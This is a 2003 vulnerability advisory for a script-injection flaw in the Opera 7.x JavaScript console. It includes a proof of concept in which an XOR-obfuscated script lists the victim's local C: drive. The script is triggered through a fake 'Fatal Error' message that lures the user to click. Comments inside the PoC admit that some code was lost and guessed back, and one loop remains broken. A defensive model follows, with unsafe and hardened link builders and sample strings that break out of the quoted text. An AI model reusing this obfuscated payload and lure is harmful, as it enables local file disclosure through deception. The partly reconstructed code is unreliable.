Script Injection Vulnerability in Opera for Windows JavaScript Console
A vulnerability in Opera for Windows can result in the execution of an arbitrary script in the Local Computer zone.
April 29, 2003
Reported April 28, 2003, by nesumin.
VERSIONS AFFECTED
Opera for Windows 7.10 (build 2840), 7.03 (build 2670), 7.02 (build 2668), 7.02 bork (build 2656b), 7.01 (build 2651)
DESCRIPTION
A vulnerability in Opera for Windows can result in the execution of an arbitrary script in the Local Computer zone. The vulnerability is caused by code in the console.html file shipped with Opera 7.x that does not sanitize the single quotation mark. The flaw permits a malicious intruder to inject an arbitrary script into the link on the Microsoft JavaScript console.
DEMONSTRATION
The discoverer posted the following code as proof of concept:
==============
This code generates a link on the JavaScript console
to read the directory listing of local disk "C:" and display it.
[1] replace "Xploit" with "script" and save as an HTML file
[2] upload to a web server
[3] open with Opera (JavaScript enabled)
[4] click the link on the JavaScript console
----------------------------------------------------------------
var depth = 1;
var startdir = "file://localhost/c:/";
// arbitrary script
var evil_script="";
evil_script += "function dt(dp){";
evil_script += "var i,j,tr,td,b;";
// the comparison operator between 'complete' and readyState was lost in
// extraction; "==" is assumed, since dt() polls until the frame has loaded
evil_script += "if('complete'==fr.document.readyState&&";
evil_script += "fr.document.getElementsByTagName('base').item(0)){";
// the <br> tags inside these string literals were rendered as line breaks
// by extraction; they are restored here as an assumption
evil_script += "tr=fr.document.getElementsByTagName('tr');b='<br>'";
evil_script += "+fr.document.getElementsByTagName('base').item(0).href;";
evil_script += "b+='<br>'+'Count : '+tr.length+'<br>';";
// the loop header was cut at '<' by extraction; the bound tr.length and the
// opening brace are assumed from the loop body and the closing brace below
evil_script += "for(i=1;i<tr.length;i++){";
evil_script += "td = tr.item(i).getElementsByTagName('td');";
evil_script += "if (td.item(0).innerText.match(/^\.\.?$/))continue;";
evil_script += "if(dp>0 && td.item(0).getElementsByTagName('img')";
evil_script += ".item(0).src.match(/\\folder\.gif$/))";
evil_script += "ds.push(td.item(0).getElementsByTagName('a').item(0).href);";
// this inner loop was also cut at '<' by extraction and its body is not
// recoverable from the page; the fragment is left as published
evil_script += "for (j=0;j";
evil_script += "b+='<br>';}tree.innerHTML+=b;";
evil_script += "if (0>=ds.length)return;fr.location.href=ds.pop();--dp;}";
evil_script += "setTimeout('dt('+dp+');',30);}var ds = new Array(),";
evil_script += "b = document.getElementsByTagName('body').item(0),";
evil_script += "f = document.createElement('iframe'),";
evil_script += "d = document.createElement('div');";
evil_script += "d.setAttribute('id','tree');b.appendChild(d);";
evil_script += "f.style.width=f.style.height=f.style.border=0;";
evil_script += "f.setAttribute('src','"+startdir+"');";
evil_script += "f.setAttribute('id','fr');";
evil_script += "b.appendChild(f);";
evil_script += "dt("+depth+");";
// xor and URLEncode
evil_script = escape(evil_script.replace(/./g,function(s){
return(String.fromCharCode(0x80^s.charCodeAt(0)))}));
var msg = "http://";
// fake url
msg += "foo.hogebar.foo/bug?summary=fatal%20error&type=unknown&content=%90%12%38%79%80m";
// code: closes the single-quoted literal in the console's link and appends the decoder
msg += "');m='";
msg += evil_script;
msg += "';eval(unescape(m).replace(/./g,function(s){";
msg += "return(String.fromCharCode(0x80^s.charCodeAt(0)))})+'";
// fake message
msg += "";
msg += "Fatal Error !!!!";
msg += " Please click above link."; // :p
opera.postError(msg);
//window.open("file://localhost/console.html","","");
location.href = "file://localhost/console.html";
----------------------------------------------------------------
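The defect the advisory describes, reduced to a small model as an added example. This is not Opera's console.html; `showMessage`, `buildLinkUnsafe`, `buildLinkSafe`, `escapeJsString`, `decodeHref` and `splitHrefLiteral` are names chosen here, and the two sample messages are constructed. The model is a console that wraps each posted message in a link whose href is a `javascript:` URL holding a single-quoted string literal. The unsafe builder concatenates the message without escaping, so a message containing a quote closes the literal and what follows runs as code; the hardened builder escapes for the string-literal context first and for the attribute context second. `splitHrefLiteral` is the check a reviewer can run over generated markup: it reports what lands outside the literal.

```javascript
// Added example (not Opera's console.html): a small model of a console that
// wraps each posted message in a link whose href is a javascript: URL holding
// a single-quoted string literal. The defect the advisory describes is that
// the single quote in the message is not sanitized, so a message can close
// the literal and everything after it runs as code.

// Vulnerable builder: the message is concatenated straight into the literal.
function buildLinkUnsafe(message) {
  return '<a href="javascript:showMessage(\'' + message + '\')">' +
         message + '</a>';
}

// Escape for the JavaScript single-quoted string context. Backslash first so
// the escapes added afterwards are not doubled. '%' is encoded too, because a
// browser percent-decodes a javascript: URL before the engine parses it, so an
// unescaped "%27" in the message would turn back into a quote.
function escapeJsString(s) {
  return s.replace(/\\/g, '\\\\')
          .replace(/'/g, "\\'")
          .replace(/%/g, '\\x25')
          .replace(/\r/g, '\\r')
          .replace(/\n/g, '\\n');
}

// Escape for the HTML text and attribute context.
function escapeHtml(s) {
  return s.replace(/&/g, '&amp;')
          .replace(/</g, '&lt;')
          .replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;')
          .replace(/'/g, '&#39;');
}

// Hardened builder: escape for the inner context (JS literal) first, then for
// the outer context (HTML attribute) around the whole href; the visible link
// text only needs HTML escaping.
function buildLinkSafe(message) {
  var href = "javascript:showMessage('" + escapeJsString(message) + "')";
  return '<a href="' + escapeHtml(href) + '">' + escapeHtml(message) + '</a>';
}

// Undo the two decodings the browser applies before the script runs: HTML
// entity decoding of the attribute value, then percent-decoding of the URL.
function decodeHref(attr) {
  var html = attr.replace(/&quot;/g, '"').replace(/&#39;/g, "'")
                 .replace(/&lt;/g, '<').replace(/&gt;/g, '>')
                 .replace(/&amp;/g, '&');
  return html.replace(/%([0-9A-Fa-f]{2})/g, function (m, h) {
    return String.fromCharCode(parseInt(h, 16));
  });
}

// Review check: pull the string literal out of the generated href the way the
// engine would and return its decoded contents plus whatever follows the
// closing quote. For a correctly built link "trailing" is exactly ")"; any
// other value is code the message smuggled out of the literal.
function splitHrefLiteral(html) {
  var m = /href="([^"]*)"/.exec(html);
  if (!m) return null;
  var href = decodeHref(m[1]);
  var prefix = "javascript:showMessage('";
  if (href.indexOf(prefix) !== 0) return null;
  var simple = { "'": "'", '\\': '\\', 'n': '\n', 'r': '\r' };
  var i = prefix.length, literal = '';
  while (i < href.length && href[i] !== "'") {
    if (href[i] === '\\' && href[i + 1] === 'x') {        // \xHH escape
      literal += String.fromCharCode(parseInt(href.substring(i + 2, i + 4), 16));
      i += 4;
    } else if (href[i] === '\\' && simple[href[i + 1]] !== undefined) {
      literal += simple[href[i + 1]];                     // \' \\ \n \r
      i += 2;
    } else {
      literal += href[i++];
    }
  }
  return { literal: literal, trailing: href.slice(i + 1) };
}

// Constructed samples: one message breaks out with a raw quote, the other
// with a percent-encoded one that only becomes a quote after URL decoding.
var rawQuote = "Fatal error');alert(1);('";
var pctQuote = "Fatal error%27);alert(1);(%27";

console.log(splitHrefLiteral(buildLinkUnsafe(rawQuote)).trailing); // );alert(1);('')
console.log(splitHrefLiteral(buildLinkUnsafe(pctQuote)).trailing); // );alert(1);('')
console.log(splitHrefLiteral(buildLinkSafe(rawQuote)).trailing);   // )
console.log(splitHrefLiteral(buildLinkSafe(pctQuote)).trailing);   // )
```

The two sample messages show why escaping only the literal quote is not enough for a `javascript:` href: the browser HTML-decodes the attribute and then percent-decodes the URL before the engine sees the literal, so each of those layers needs its own encoding, applied in the reverse order of decoding. The parser in `splitHrefLiteral` models exactly those steps, which is what makes it usable as a regression check on generated console markup.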
VENDOR RESPONSE
Opera (https://www.opera.com/) has yet to respond to this problem.
CREDIT
Discovered by nesumin.